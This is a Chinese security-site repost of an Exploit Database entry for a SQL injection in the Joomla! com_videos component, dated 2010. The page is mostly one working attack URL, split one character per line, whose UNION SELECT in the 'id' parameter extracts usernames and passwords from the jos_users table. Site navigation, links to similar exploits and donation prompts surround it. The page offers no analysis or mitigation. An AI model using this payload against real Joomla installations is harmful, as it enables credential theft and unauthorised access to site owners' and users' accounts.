博文
设计开发
网络安全
观察
服务
AI导航
更多
关于
分享
老电影
搜索语法/SHDB
Exploits
SecTools
UserAgent解析
地理坐标在线转换
Joomla! Component com_videos – SQL Injection
Exploit Database
137 阅读
作者:
snakespc
日期:
2010-02-14
类别:
webapps
平台:
php
来源:
https://www.exploit-db.com/exploits/11449/
1
2
3
4
http
:
/
/
server
/
index
.
php
?
option
=
com_videos
&
act
=
view
&
Itemid
=
27
&
id
=
-
1084
+
UNION
SELECT
1
,
concat
(
username
,
0x3a
,
password
)
,
3
,
4
,
5
,
6
,
7
,
8
,
9
,
10
,
11
,
12
,
13
,
14
,
15
,
16
,
17
,
18
,
19
,
20
,
21
,
22
,
23
,
24
+
from
+
jos_users
Snakespc
上一篇: Vito CMS – SQL Injection
下一篇: httpdx 1.5 – ‘MKD’ Directory Traversal
last Exploits
Joomla! Component com_videos – SQL Injection的更多信息
Chyrp 2.x – ‘/includes/lib/gz.php?File’ Traversal Arbitrary File Access
:
Spitfire 1.0.381 – Cross-Site Scripting / Cross-Site Request Forgery
:
Juniper Junos J-Web – Privilege Escalation
:
DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal
:
DNET Live-Stats 0.8 – Local File Inclusion
:
Lexmark Services Monitor 2.27.4.0.39 – Directory Traversal
:
My PHP Dating 2.0 – ‘id’ SQL Injection
:
Joomla! Component com_press – SQL Injection
:
×
扫码分享
验证:
体验盒子
扫码分享
×
打赏零钱
×
支付宝打赏
微信打赏